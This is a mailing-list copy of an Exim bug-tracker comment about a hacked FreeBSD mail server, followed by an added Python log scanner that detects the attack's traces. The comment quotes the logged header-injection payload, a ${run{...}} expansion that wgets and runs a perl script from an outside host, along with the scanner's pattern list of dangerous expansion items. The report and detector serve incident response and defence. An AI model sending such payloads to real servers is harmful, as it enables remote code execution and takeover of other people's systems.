------- You are receiving this mail because: -------
You are on the CC list for the bug.

http://bugs.exim.org/show_bug.cgi?id=1135

--- Comment #8 from Adrian P <[email protected]> 2011-08-12 19:38:42 ---

This was / is the default config, which is a modified copy of the configure.default coming with exim. exim was installed from ports:

# $FreeBSD: ports/mail/exim/Makefile,v 1.259 2011/05/11 11:30:17 rea Exp $

The machine was just cleaned up afterwards (as in: kill all the exim and perl processes; the trojan was a perl payload (my @fakeps = ("/usr/sbin/exim4 -bd -q1h");)). exim was rebuilt using the latest version from freebsd ports. Because the system wasn't reinstalled afterwards I can't be 100% sure it was clean, but the 2nd time it was the same modus operandi: perl script running as mailnull with fake ps, and basically this payload (this was used on 4.69 and was logged by exim):

Header0054: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
Header0055: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
HeaderX: ${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130 .19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${ run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh -c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;rm -f /tmp/g.x*'}}${run{/bin/sh - c 'killall -9 perl;wget 85.25.130.19/gods.txt -O /tmp/g.x;perl /tmp/g.x;r tmp/g.x*'}}${run{ *** truncated ***

2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent too soon: pipelining was advertised): rejected "Header0000: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV" H=42.d.5446.static.theplanet.com (yougotpwned.com) [70.84.13.66] next input="Header0001: VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\nHeader000"
2011-07-21 06:46:26 SMTP protocol synchronization error (input sent without waiting for greeting): rejected connection from H=[208.57.239.52] input="GET / HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac "

// looks like msf running on iphone

Just in case, I will leave that machine acting as a honey pot (the OS was rebuilt yesterday) but with the same version of exim and config.

On 11-08-12 11:28 AM, Graeme Fowler wrote:
> http://bugs.exim.org/show_bug.cgi?id=1135
>
> --- Comment #7 from Graeme Fowler <[email protected]> 2011-08-12 16:28:00 ---
> (In reply to comment #6)
>> that was the config at the time
> What was, the default config?
>
> If so - was that the stock default config from the distribution, a default config supplied by the FreeBSD ports collection, a packaged default config from somewhere else?
>
> Please add it as an attachment to this bug. If it's irrelevant, at least we'll have proved that it is, but until then it may have some relevance.
>
> I might also add - did you rebuild the machine in the first place after it got hacked, or do some sort of "clearup" operation? Are you absolutely sure that it got completely secured?

--
Configure bugmail: http://bugs.exim.org/userprefs.cgi?tab=email
--
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
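The log excerpt in this comment shows the two things a defender can key on: Exim string-expansion items (here `${run{...}}`) arriving inside inbound message headers, and the padding headers and "SMTP protocol synchronization error" lines that accompanied them. Below is an added Python example, not part of the bug report or of Exim, that scans Exim mainlog-style lines for those indicators and counts hits per peer address. The log lines it runs over are constructed for the example (the IPs are documentation addresses and the command inside the expansion is a harmless placeholder); the `H=` field and the expansion item names (`run`, `readfile`, `readsocket`, `perl`, `dlfunc`) are real Exim syntax.

```python
import re
from collections import Counter
from typing import Dict, List

# Real Exim string-expansion items that execute code or read external data.
# The bug report shows ${run{...}} inside a header, which Exim logged when it
# rejected the message; none of these belong in data received over SMTP.
DANGEROUS_ITEMS = ("run", "readfile", "readsocket", "perl", "dlfunc")

# Whitespace after "${" is tolerated on purpose: the excerpt in the bug was
# line-wrapped by a mail client ("${ run{"), and wrapped logs still need to match.
EXPANSION_RE = re.compile(
    r"\$\{\s*(" + "|".join(DANGEROUS_ITEMS) + r")\s*\{", re.IGNORECASE
)

# Header value that is one character repeated 64+ times, like the "VVVV..."
# padding headers in the report. Heuristic only, but rare in legitimate mail.
FILLER_RE = re.compile(r"Header\w*: (.)\1{63,}")

SYNC_ERROR_RE = re.compile(r"SMTP protocol synchronization error")

# Exim's H= field: "H=name (helo) [ip]", "H=name [ip]" or just "H=[ip]".
HOST_RE = re.compile(r"H=(?:[^\s\[]+ (?:\([^)]*\) )?)?\[([^\]]+)\]")


def classify_line(line: str) -> List[str]:
    """Return the reasons a single Exim log line looks suspicious (empty if none)."""
    reasons: List[str] = []
    m = EXPANSION_RE.search(line)
    if m:
        reasons.append("expansion:" + m.group(1).lower())
    if FILLER_RE.search(line):
        reasons.append("filler-header")
    if SYNC_ERROR_RE.search(line):
        reasons.append("sync-error")
    return reasons


def peer_ip(line: str) -> str:
    """Extract the peer IP from the H= field, or 'unknown' if the line has none."""
    m = HOST_RE.search(line)
    return m.group(1) if m else "unknown"


def scan_exim_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and return one finding per suspicious line."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, start=1):
        reasons = classify_line(line)
        if reasons:
            findings.append({"line_no": n, "ip": peer_ip(line), "reasons": reasons})
    return findings


def hosts_by_hits(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count findings per peer address, to see which hosts keep coming back."""
    return dict(Counter(str(f["ip"]) for f in findings))


# Constructed sample log (documentation IPs, placeholder command); not real data.
PADDING = "V" * 80
SAMPLE_LOG = [
    "2011-07-21 06:14:54 SMTP protocol synchronization error (next input sent too soon: "
    f'pipelining was advertised): rejected "Header0000: {PADDING}" '
    f'H=mail.example.test (example.test) [192.0.2.10] next input="Header0001: {PADDING}"',
    "2011-07-21 06:15:02 H=mail.example.test (example.test) [192.0.2.10] rejected "
    "\"HeaderX: ${run{/bin/sh -c 'echo constructed-sample'}}\"",
    "2011-07-21 06:46:26 SMTP protocol synchronization error (input sent without waiting "
    'for greeting): rejected connection from H=[192.0.2.20] input="GET / HTTP/1.1\\r\\n"',
    "2011-07-21 07:00:00 1QjRkP-0001aB-4x <= sender@example.test "
    "H=mail.example.test [192.0.2.30] P=esmtp S=1234",
]

if __name__ == "__main__":
    results = scan_exim_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line_no']}: {f['ip']}: {', '.join(f['reasons'])}")
    print("hits per host:", hosts_by_hits(results))
```

Running the block prints three findings (the padded header plus sync error, the `${run{` header, and the HTTP request sent before the banner) and attributes two of them to the same peer; the benign delivery line produces nothing. Pointing `scan_exim_log` at a real mainlog is a matter of reading the file into `lines`.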
